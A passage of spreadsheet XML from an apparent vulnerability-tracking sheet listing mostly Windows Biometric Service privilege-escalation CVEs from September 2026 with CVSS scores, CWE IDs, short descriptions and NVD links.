          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72994</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72995</t>
        </is>
      </c>
      <c r="D183" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F183" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K18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3" s="5" t="inlineStr"/>
      <c r="M183" s="5" t="inlineStr"/>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr"/>
      <c r="Q183" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R183" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72995</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72996</t>
        </is>
      </c>
      <c r="D184" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F184" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K18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4" s="5" t="inlineStr"/>
      <c r="M184" s="5" t="inlineStr"/>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr"/>
      <c r="Q184" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R184" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72996</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72997</t>
        </is>
      </c>
      <c r="D185" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F185" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K18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5" s="5" t="inlineStr"/>
      <c r="M185" s="5" t="inlineStr"/>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr"/>
      <c r="Q185" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R185" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72997</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73000</t>
        </is>
      </c>
      <c r="D186" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F186" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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6" s="5" t="inlineStr"/>
      <c r="M186" s="5" t="inlineStr"/>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr"/>
      <c r="Q186" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R186" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73000</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73001</t>
        </is>
      </c>
      <c r="D187" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F187" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K18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7" s="5" t="inlineStr"/>
      <c r="M187" s="5" t="inlineStr"/>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr"/>
      <c r="Q187" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R187" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73001</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73002</t>
        </is>
      </c>
      <c r="D188" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F188" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K18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8" s="5" t="inlineStr"/>
      <c r="M188" s="5" t="inlineStr"/>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P188" s="5" t="inlineStr"/>
      <c r="Q188" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R188" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73002</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73007</t>
        </is>
      </c>
      <c r="D189" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F189" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K18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89" s="5" t="inlineStr"/>
      <c r="M189" s="5" t="inlineStr"/>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr"/>
      <c r="Q189" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R189" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73007</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73011</t>
        </is>
      </c>
      <c r="D190" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F190" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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0" s="5" t="inlineStr"/>
      <c r="M190" s="5" t="inlineStr"/>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr"/>
      <c r="Q190" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R190" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73011</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73015</t>
        </is>
      </c>
      <c r="D191" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F191" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I191" s="5" t="inlineStr"/>
      <c r="J191" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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1" s="5" t="inlineStr"/>
      <c r="M191" s="5" t="inlineStr"/>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr"/>
      <c r="Q191" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R191" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73015</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73020</t>
        </is>
      </c>
      <c r="D192" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E192" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F192" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K19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2" s="5" t="inlineStr"/>
      <c r="M192" s="5" t="inlineStr"/>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr"/>
      <c r="Q192" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R192" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73020</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73021</t>
        </is>
      </c>
      <c r="D193" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F193" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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3" s="5" t="inlineStr"/>
      <c r="M193" s="5" t="inlineStr"/>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr"/>
      <c r="Q193" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R193" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73021</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73026</t>
        </is>
      </c>
      <c r="D194" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F194" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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4" s="5" t="inlineStr"/>
      <c r="M194" s="5" t="inlineStr"/>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr"/>
      <c r="Q194" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R194" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73026</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76967</t>
        </is>
      </c>
      <c r="D195" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F195" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K195" s="5" t="inlineStr"/>
      <c r="L195" s="5" t="inlineStr"/>
      <c r="M195" s="5" t="inlineStr"/>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P195" s="5" t="inlineStr"/>
      <c r="Q195" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R195" s="5" t="inlineStr">
        <is>
          <t>SAP NetWeaver Business Client does not perform sufficient validation when processing certain locally stored data during application startup. An attacker with low privileges on the local system could replace this data with specially crafted content. When the application is next launched, the crafted content is processed and could lead to arbitrary code execution in the context of the user. This results in a high impact on confidentiality, integrity and availability of the application.</t>
        </is>
      </c>
      <c r="S195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76967</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77489</t>
        </is>
      </c>
      <c r="D196" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F196" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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6" s="5" t="inlineStr"/>
      <c r="M196" s="5" t="inlineStr"/>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr"/>
      <c r="Q196" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R196" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77489</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77500</t>
        </is>
      </c>
      <c r="D197" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F197" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G197" s="5" t="inlineStr"/>
      <c r="H197" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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97" s="5" t="inlineStr"/>
      <c r="M197" s="5" t="inlineStr"/>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr"/>
      <c r="Q197" s="5" t="inlineStr">
        <is>
          <t>CWE-763</t>
        </is>
      </c>
      <c r="R197" s="5" t="inlineStr">
        <is>
          <t>Release of invalid pointer or reference in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77500</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77503</t>
        </is>
      </c>
      <c r="D198" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E198" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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98" s="5" t="inlineStr"/>
      <c r="M198" s="5" t="inlineStr"/>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr"/>
      <c r="Q198" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R198" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an unauthorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77503</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77904</t>
        </is>
      </c>
      <c r="D199" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E199" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F199" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K19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99" s="5" t="inlineStr"/>
      <c r="M199" s="5" t="inlineStr"/>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr"/>
      <c r="Q199" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R199" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77904</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78447</t>
        </is>
      </c>
      <c r="D200" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E200" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F200" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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0" s="5" t="inlineStr"/>
      <c r="M200" s="5" t="inlineStr"/>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr"/>
      <c r="Q200" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R200" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78447</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78448</t>
        </is>
      </c>
      <c r="D201" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E201" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F201" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr">
        <is>
